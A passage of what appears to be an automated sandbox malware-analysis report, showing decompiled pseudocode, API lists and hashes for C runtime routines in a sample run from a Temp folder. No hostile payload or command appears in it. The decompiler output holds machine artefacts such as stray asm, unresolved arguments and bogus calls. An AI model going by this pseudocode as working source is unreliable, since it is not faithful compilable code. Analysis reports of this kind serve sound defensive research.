                                                          							 *((intOrPtr*)(_t67 +  *((intOrPtr*)(0x9cf230 + (_t65 >> 5) * 4)))) = _t36;
                                                          						} else {
                                                          							E009AF0DF(GetLastError());
                                                          							 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) & 0x000000fe;
                                                          							E009B3BAF( *_t68);
                                                          							_t48 =  *((intOrPtr*)(E009AF100()));
                                                          						}
                                                          					}
                                                          				}
                                                          				_t33 = _t48;
                                                          				return _t33;
                                                          			}














                                                          APIs
                                                          • CloseHandle.KERNEL32(?), ref: 009B2CDE
                                                          • ___createFile.LIBCMT ref: 009B2CFD
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B2D0A
                                                          • __dosmaperr.LIBCMT ref: 009B2D11
                                                          • __free_osfhnd.LIBCMT ref: 009B2D31
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFileHandleLast___create__dosmaperr__free_osfhnd
                                                          • String ID:
                                                          • API String ID: 1832824508-0
                                                          • Opcode ID: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction ID: 51bb2f7f9d771b055be6b00e6ef8734223032a922ed6864034bb30c536be8733
                                                          • Opcode Fuzzy Hash: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction Fuzzy Hash: 0811763192010A5FCB0A8F64EF54AEDBF26FB44370F288218F961572E2CB228D11D780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E009BE04E(void* __eax, void* __edx, char _a4, intOrPtr _a8) {
                                                          				intOrPtr _t15;
                                                          				short* _t30;
                                                          
                                                          				_t30 = _a4;
                                                          				if(_t30 != 0 &&  *_t30 != 0) {
                                                          					_push("ACP");
                                                          					 *((intOrPtr*)(_t30 - 0x18)) =  *((intOrPtr*)(_t30 - 0x18)) + __edx;
                                                          					if(__eax != 0) {
                                                          						if(E009BDB28(0x59fffffa, ?str?) != 0) {
                                                          							return E009BEFC5(0x59fffffa);
                                                          						}
                                                          						if(E009B9FDB(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
                                                          							L10:
                                                          							return 0;
                                                          						}
                                                          						return _a4;
                                                          					}
                                                          				}
                                                          				if(E009B9FDB(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
                                                          					goto L10;
                                                          				}
                                                          				_t15 = _a4;
                                                          				if(_t15 == 0) {
                                                          					return GetACP();
                                                          				}
                                                          				return _t15;
                                                          			}






                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 856254489-711371036
                                                          • Opcode ID: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction ID: 68469801770710b5232a3fc01aca10e9955a910c6a7855087d04a112b364d74a
                                                          • Opcode Fuzzy Hash: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction Fuzzy Hash: C401D83664921DBAEB24BA68DE42FE6339CDF40375F048815FE08D6181F7B4D94083D6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009BA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v20;
                                                          				signed int _t35;
                                                          				int _t38;
                                                          				signed int _t41;
                                                          				int _t42;
                                                          				intOrPtr* _t44;
                                                          				int _t47;
                                                          				short* _t49;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				int _t55;
                                                          				signed int _t59;
                                                          				char* _t62;
                                                          
                                                          				_t62 = _a8;
                                                          				if(_t62 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t50 = _a12;
                                                          				if(_t50 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if( *_t62 != 0) {
                                                          					E009B2DB9( &_v20, _a16);
                                                          					_t35 = _v20;
                                                          					__eflags =  *(_t35 + 0xa8);
                                                          					if( *(_t35 + 0xa8) != 0) {
                                                          						_t38 = E009BA1C7( *_t62 & 0x000000ff,  &_v20);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							__eflags = _a4;
                                                          							_t41 = _v20;
                                                          							_t59 = 1;
                                                          							_t28 = _t41 + 4; // 0x840ffff8
                                                          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                          							__eflags = _t42;
                                                          							if(_t42 != 0) {
                                                          								L21:
                                                          								__eflags = _v8;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
                                                          									_t31 = _t54 + 0x70;
                                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                          									__eflags =  *_t31;
                                                          								}
                                                          								return _t59;
                                                          							}
                                                          							L20:
                                                          							_t44 = E009AF100();
                                                          							_t59 = _t59 | 0xffffffff;
                                                          							__eflags = _t59;
                                                          							 *_t44 = 0x2a;
                                                          							goto L21;
                                                          						}
                                                          						_t59 = _v20;
                                                          						__eflags =  *(_t59 + 0x74) - 1;
                                                          						if( *(_t59 + 0x74) <= 1) {
                                                          							L15:
                                                          							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                                          							__eflags = _t50 -  *_t20;
                                                          							L16:
                                                          							if(__eflags < 0) {
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t62[1];
                                                          							if(_t62[1] == 0) {
                                                          								goto L20;
                                                          							}
                                                          							L18:
                                                          							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                                          							_t59 =  *_t22;
                                                          							goto L21;
                                                          						}
                                                          						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                                          						__eflags = _t50 -  *_t12;
                                                          						if(__eflags < 0) {
                                                          							goto L16;
                                                          						}
                                                          						__eflags = _a4;
                                                          						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                                          						_t18 = _t59 + 4; // 0x840ffff8
                                                          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                          						_t59 = _v20;
                                                          						__eflags = _t47;
                                                          						if(_t47 != 0) {
                                                          							goto L18;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					_t55 = _a4;
                                                          					__eflags = _t55;
                                                          					if(_t55 != 0) {
                                                          						 *_t55 =  *_t62 & 0x000000ff;
                                                          					}
                                                          					_t59 = 1;
                                                          					goto L21;
                                                          				}
                                                          				_t49 = _a4;
                                                          				if(_t49 != 0) {
                                                          					 *_t49 = 0;
                                                          				}
                                                          				goto L5;
                                                          			}



















                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BA46C
                                                          • __isleadbyte_l.LIBCMT ref: 009BA49A
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 009BA4C8
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 009BA4FE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction ID: 8f52befa4c2e748f79f95a784e2a1c2d106a4ad648a4af1624d9444e3cbe01d4
                                                          • Opcode Fuzzy Hash: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction Fuzzy Hash: 3131CF30604246AFDB218F65CE48BFA7BAAFF41330F158529F865871A0E7B0D950DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E009A46C9(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi) {
                                                          				void* _t47;
                                                          				intOrPtr _t48;
                                                          				intOrPtr* _t49;
                                                          				void* _t64;
                                                          				void* _t65;
                                                          				signed int _t66;
                                                          				signed int _t68;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				void* _t77;
                                                          				intOrPtr _t78;
                                                          				void* _t79;
                                                          				signed int _t80;
                                                          
                                                          				_t64 = __ebx;
                                                          				asm("rol byte [eax-0x77], 0x41");
                                                          				_t76 = __edi - 1;
                                                          				_t74 =  *(_t80 - 0x2bc);
                                                          				 *__ecx =  *((intOrPtr*)(_t76 + 4));
                                                          				 *((intOrPtr*)(_t76 + 0x70)) =  *((intOrPtr*)(__ecx + 4));
                                                          				_t47 =  *((intOrPtr*)(0x9c84f8 + _t74 * 0xc))();
                                                          				_t48 =  *((intOrPtr*)(_t80 - 0x2dc));
                                                          				_t68 = _t76;
                                                          				if(_t47 == 0) {
                                                          					if(_t48 != 0x9ce694) {
                                                          						asm("lock xadd [eax], ecx");
                                                          						if((_t68 | 0xffffffff) == 0) {
                                                          							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x1c)));
                                                          							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x18)));
                                                          							E009B2248( *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)));
                                                          							 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t78;
                                                          							 *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)) = _t78;
                                                          						}
                                                          					}
                                                          					_t49 =  *((intOrPtr*)(_t80 - 0x2e0));
                                                          					 *_t49 = 1;
                                                          					 *((intOrPtr*)(_t64 + _t76 + 0x1c)) = _t49;
                                                          				} else {
                                                          					 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t48;
                                                          					_t66 =  *(_t80 - 0x2bc);
                                                          					E009B2248( *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)));
                                                          					 *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)) =  *((intOrPtr*)(_t80 - 0x2e8));
                                                          					E009B2248( *((intOrPtr*)(_t80 - 0x2e0)));
                                                          					 *((intOrPtr*)(_t76 + 4)) =  *((intOrPtr*)(_t80 - 0x2e4));
                                                          				}
                                                          				_pop(_t77);
                                                          				_pop(_t79);
                                                          				_pop(_t65);
                                                          				return E009B1E0D(_t65,  *(_t80 - 4) ^ _t80, _t74, _t77, _t79);
                                                          			}

















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$StringType___crt_memcmp
                                                          • String ID:
                                                          • API String ID: 1184073126-0
                                                          • Opcode ID: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction ID: 98e7d9b28e4212d626c4dff7457ae6ebe5ec8b29fa03140aa2a72fdd2b263a15
                                                          • Opcode Fuzzy Hash: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction Fuzzy Hash: DD317E70A0221A9FCB10DF28CA84BE9B7B8FB09314F2045E9E519D7252DB319D92CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 56%
                                                          			E009A6233(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi) {
                                                          				void* _t80;
                                                          				signed char _t81;
                                                          				char* _t83;
                                                          				signed int _t84;
                                                          				signed char _t86;
                                                          				signed int _t87;
                                                          				signed int _t89;
                                                          				long _t97;
                                                          				signed int _t102;
                                                          				char _t103;
                                                          				char _t104;
                                                          				signed int _t106;
                                                          				signed int _t110;
                                                          				void* _t111;
                                                          				void* _t114;
                                                          				void* _t115;
                                                          				void* _t116;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          				char* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t124;
                                                          				intOrPtr _t126;
                                                          				signed int _t133;
                                                          				signed int _t136;
                                                          				signed int _t138;
                                                          				signed int _t140;
                                                          				char* _t142;
                                                          				signed int _t143;
                                                          				signed char* _t145;
                                                          				int _t146;
                                                          				signed int _t147;
                                                          				void* _t148;
                                                          				void* _t150;
                                                          				void* _t163;
                                                          
                                                          				_t143 = __esi;
                                                          				_t138 = __edi;
                                                          				_t133 = __edx;
                                                          				_t123 = __ecx;
                                                          				_t119 = __ebx;
                                                          				while(1) {
                                                          					L13:
                                                          					 *((intOrPtr*)(_t148 - 0x74af00bb)) =  *((intOrPtr*)(_t148 - 0x74af00bb)) + _t123;
                                                          					asm("pushfd");
                                                          					_t119 = _t119 + _t119;
                                                          					if(ReadFile(??, ??, ??, ??, ??) != 0 || GetLastError() == 0) {
                                                          						goto L15;
                                                          					}
                                                          					L30:
                                                          					_t133 =  *(_t148 - 0xc);
                                                          					_t123 = 0xd;
                                                          					 *_t143 = _t123;
                                                          					_t143 = _t143 + 1;
                                                          					L25:
                                                          					while(_t138 <  *((intOrPtr*)(_t148 - 0x1c))) {
                                                          						_t80 =  *_t138;
                                                          						__eflags = _t80 - 0x1a;
                                                          						if(_t80 == 0x1a) {
                                                          							_t124 =  *((intOrPtr*)(0x9cf230 + _t133 * 4));
                                                          							_t81 =  *(_t124 + _t119 + 4);
                                                          							__eflags = _t81 & 0x00000040;
                                                          							if((_t81 & 0x00000040) != 0) {
                                                          								 *_t143 =  *_t138;
                                                          								_t143 = _t143 + 1;
                                                          								__eflags = _t143;
                                                          							} else {
                                                          								 *(_t124 + _t119 + 4) = _t81 | 0x00000002;
                                                          							}
                                                          						} else {
                                                          							__eflags = _t80 - _t123;
                                                          							if(_t80 == _t123) {
                                                          								__eflags = _t138 -  *((intOrPtr*)(_t148 - 0x1c)) - 1;
                                                          								if(_t138 >=  *((intOrPtr*)(_t148 - 0x1c)) - 1) {
                                                          									_push(0);
                                                          									_t138 = _t138 + 1;
                                                          									__eflags = _t138;
                                                          									_push(_t148 - 0x14);
                                                          									_push(1);
                                                          									goto L13;
                                                          								} else {
                                                          									_t3 = _t138 + 1; // 0x9b2b48
                                                          									_t110 = _t3;
                                                          									__eflags =  *_t110 - 0xa;
                                                          									if( *_t110 != 0xa) {
                                                          										 *_t143 = _t123;
                                                          										_t138 = _t110;
                                                          										_t143 = _t143 + 1;
                                                          									} else {
                                                          										_t111 = 0xa;
                                                          										_t138 = _t138 + 2;
                                                          										 *_t143 = _t111;
                                                          										L29:
                                                          										_t143 = _t143 + 1;
                                                          									}
                                                          								}
                                                          							} else {
                                                          								 *_t143 = _t80;
                                                          								_t143 = _t143 + 1;
                                                          								_t138 = _t138 + 1;
                                                          							}
                                                          							continue;
                                                          						}
                                                          						L34:
                                                          						_t83 =  *(_t148 - 0x10);
                                                          						_t140 = _t143 - _t83;
                                                          						if( *((char*)(_t148 + 0x13)) != 1 || _t140 == 0) {
                                                          							L58:
                                                          							_t120 =  *(_t148 - 0x18);
                                                          							0x74a7428b();
                                                          						} else {
                                                          							_t145 = _t143 - 1;
                                                          							_t86 =  *_t145;
                                                          							if(_t86 < 0) {
                                                          								_t87 = _t86 & 0x000000ff;
                                                          								_t136 = 1;
                                                          								__eflags =  *((char*)(_t87 + 0x9ce408));
                                                          								if( *((char*)(_t87 + 0x9ce408)) == 0) {
                                                          									_t122 =  *(_t148 - 0x10);
                                                          									while(1) {
                                                          										__eflags = _t136 - 4;
                                                          										if(_t136 > 4) {
                                                          											break;
                                                          										}
                                                          										__eflags = _t145 - _t122;
                                                          										if(_t145 >= _t122) {
                                                          											_t145 = _t145 - 1;
                                                          											_t136 = _t136 + 1;
                                                          											_t106 =  *_t145 & 0x000000ff;
                                                          											__eflags =  *((char*)(_t106 + 0x9ce408));
                                                          											if( *((char*)(_t106 + 0x9ce408)) == 0) {
                                                          												continue;
                                                          											}
                                                          										}
                                                          										break;
                                                          									}
                                                          									_t119 =  *(_t148 - 0x24);
                                                          								}
                                                          								_t89 =  *((char*)(( *_t145 & 0x000000ff) + 0x9ce408));
                                                          								__eflags = _t89;
                                                          								if(_t89 != 0) {
                                                          									__eflags = _t89 + 1 - _t136;
                                                          									if(_t89 + 1 != _t136) {
                                                          										_t126 =  *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4));
                                                          										__eflags =  *(_t126 + _t119 + 4) & 0x00000048;
                                                          										if(__eflags == 0) {
                                                          											asm("cdq");
                                                          											E009B3F56(_t126, __eflags,  *((intOrPtr*)(_t148 + 8)),  ~_t136,  ~_t136, 1);
                                                          										} else {
                                                          											_t147 =  &(_t145[1]);
                                                          											 *((char*)(_t126 + _t119 + 5)) =  *_t145;
                                                          											_t102 =  *(_t148 - 0xc);
                                                          											__eflags = _t136 - 2;
                                                          											if(_t136 >= 2) {
                                                          												_t104 =  *_t147;
                                                          												_t147 = _t147 + 1;
                                                          												__eflags = _t147;
                                                          												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x25)) = _t104;
                                                          												_t102 =  *(_t148 - 0xc);
                                                          											}
                                                          											__eflags = _t136 - 3;
                                                          											if(_t136 == 3) {
                                                          												_t103 =  *_t147;
                                                          												_t147 = _t147 + 1;
                                                          												__eflags = _t147;
                                                          												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x26)) = _t103;
                                                          											}
                                                          											_t145 = _t147 - _t136;
                                                          										}
                                                          									} else {
                                                          										_t145 =  &(_t145[_t136]);
                                                          									}
                                                          									goto L55;
                                                          								} else {
                                                          									 *((intOrPtr*)(E009AF100())) = 0x2a;
                                                          									goto L3;
                                                          								}
                                                          							} else {
                                                          								_t145 =  &(_t145[1]);
                                                          								L55:
                                                          								_t142 =  *(_t148 - 0x10);
                                                          								_t146 = _t145 - _t142;
                                                          								_t140 = MultiByteToWideChar(0xfde9, 0, _t142, _t146,  *(_t148 + 0xc),  *(_t148 - 0x28) >> 1);
                                                          								if(_t140 == 0) {
                                                          									_t97 = GetLastError();
                                                          									E009AF0DF(_t97);
                                                          									L3:
                                                          									_t120 = _t119 | 0xffffffff;
                                                          									__eflags = _t120;
                                                          									_t83 =  *(_t148 - 0x10);
                                                          								} else {
                                                          									_t163 = _t140 - _t146;
                                                          									_t140 = _t140 + _t140;
                                                          									 *( *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4)) + _t119 + 0x30) = 0 | _t163 != 0x00000000;
                                                          									_t83 =  *(_t148 - 0x10);
                                                          									goto L58;
                                                          								}
                                                          							}
                                                          						}
                                                          						L60:
                                                          						if(_t83 !=  *(_t148 + 0xc)) {
                                                          							E009B2248(_t83);
                                                          						}
                                                          						if(_t120 != 0xfffffffe) {
                                                          							_t140 = _t120;
                                                          						}
                                                          						_t84 = _t140;
                                                          						return _t84;
                                                          					}
                                                          					goto L34;
                                                          					L15:
                                                          					if( *((intOrPtr*)(_t148 - 0x14)) == 0) {
                                                          						goto L30;
                                                          					} else {
                                                          						_t133 =  *(_t148 - 0xc);
                                                          						if(( *( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 4) & 0x00000048) == 0) {
                                                          							__eflags = _t143 -  *(_t148 - 0x10);
                                                          							if(__eflags != 0) {
                                                          								L27:
                                                          								E009B3F56(_t123, __eflags,  *((intOrPtr*)(_t148 + 8)), 0xffffffff, 0xffffffff, 1);
                                                          								_t133 =  *(_t148 - 0xc);
                                                          								_t150 = _t150 + 0x10;
                                                          								_t114 = 0xa;
                                                          								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t114;
                                                          								if( *((intOrPtr*)(_t148 - 1)) == _t114) {
                                                          									goto L23;
                                                          								} else {
                                                          									_t123 = 0xd;
                                                          									 *_t143 = _t123;
                                                          									goto L29;
                                                          								}
                                                          								goto L60;
                                                          							} else {
                                                          								_t115 = 0xa;
                                                          								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t115;
                                                          								if(__eflags != 0) {
                                                          									goto L27;
                                                          								} else {
                                                          									 *_t143 = _t115;
                                                          									_t143 = _t143 + 1;
                                                          									__eflags = _t143;
                                                          									L23:
                                                          									_push(0xd);
                                                          									goto L24;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t116 = 0xa;
                                                          							_push(0xd);
                                                          							if( *((intOrPtr*)(_t148 - 1)) != _t116) {
                                                          								 *_t143 = 0xd;
                                                          								_t143 = _t143 + 1;
                                                          								 *((char*)( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 5)) =  *((intOrPtr*)(_t148 - 1));
                                                          							} else {
                                                          								 *_t143 = _t116;
                                                          								_t143 = _t143 + 1;
                                                          							}
                                                          							L24:
                                                          							_pop(_t123);
                                                          						}
                                                          					}
                                                          					goto L25;
                                                          				}
                                                          			}


                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 009AFB7C
                                                          • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?,00000080,00000003), ref: 009AFB86
                                                          • __lseeki64_nolock.LIBCMT ref: 009AFBF1
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,009B2B47,009B2B46,?,?,?,?,?,?,?,?,00000001,00000000), ref: 009AFD1F
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                                                          • String ID:
                                                          • API String ID: 1844164652-0
                                                          • Opcode ID: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction ID: e83d34a6351770bb20fcbe2a14f7493020441cfe0f9b0acd19aea8c2788bf9b3
                                                          • Opcode Fuzzy Hash: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction Fuzzy Hash: 6F210B35A042059FDB11CFECD864BADB7B9EF46720F244479EC95DB291C73498458BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009C2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				intOrPtr _t25;
                                                          				void* _t26;
                                                          
                                                          				_t25 = _a16;
                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                          					_t26 = E009C27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          					goto L9;
                                                          				} else {
                                                          					_t34 = _t25 - 0x66;
                                                          					if(_t25 != 0x66) {
                                                          						__eflags = _t25 - 0x61;
                                                          						if(_t25 == 0x61) {
                                                          							L7:
                                                          							_t26 = E009C22E5(_a4, _a8, _a12, _a20, _a24, _a28);
                                                          						} else {
                                                          							__eflags = _t25 - 0x41;
                                                          							if(__eflags == 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								_t26 = E009C2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          							}
                                                          						}
                                                          						L9:
                                                          						return _t26;
                                                          					} else {
                                                          						return E009C2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                          					}
                                                          				}
                                                          			}


                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction ID: 17e066fa11468b813839086f4db12a5240bf5f19a64551474df990d6bf1a586b
                                                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction Fuzzy Hash: 5E01403280014ABBCF165F84DC41EEE3F26BF29354F588519FE2858035D736C9B1AB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E009A5765(signed int __ebx) {
                                                          				signed int _t9;
                                                          				signed int _t10;
                                                          				void* _t19;
                                                          				void* _t21;
                                                          				void* _t22;
                                                          				signed int _t24;
                                                          				void* _t25;
                                                          				void* _t27;
                                                          
                                                          				_pop(_t27);
                                                          				asm("cld");
                                                          				if(__ebx >= 0x3fffffff) {
                                                          					L6:
                                                          					_t10 = _t9 | 0xffffffff;
                                                          				} else {
                                                          					_t9 =  *(_t27 - 8);
                                                          					if(_t9 >= 0x7fffffff) {
                                                          						goto L6;
                                                          					} else {
                                                          						_t19 = _t9 + __ebx * 2;
                                                          						_t9 = _t9 + _t9;
                                                          						_t20 = _t19 + _t19;
                                                          						if(_t19 + _t19 < _t9) {
                                                          							goto L6;
                                                          						} else {
                                                          							_t9 = E009B22C8(_t22, _t20);
                                                          							_t24 = _t9;
                                                          							_pop(_t21);
                                                          							if(_t24 == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								E009B1127(_t21, _t25, _t24, _t24 + __ebx * 4, _t27 - 4, _t27 - 8);
                                                          								 *0x9cf204 = _t24;
                                                          								 *0x9cf1fc =  *((intOrPtr*)(_t27 - 4)) - 1;
                                                          								_t10 = 0;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t10;
                                                          			}











                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009B10E8
                                                            • Part of subcall function 009B22C8: _malloc.LIBCMT ref: 009B22D9
                                                          • _wparse_cmdline.LIBCMT ref: 009B1102
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe, xrefs: 009B1101
                                                          Memory Dump Source
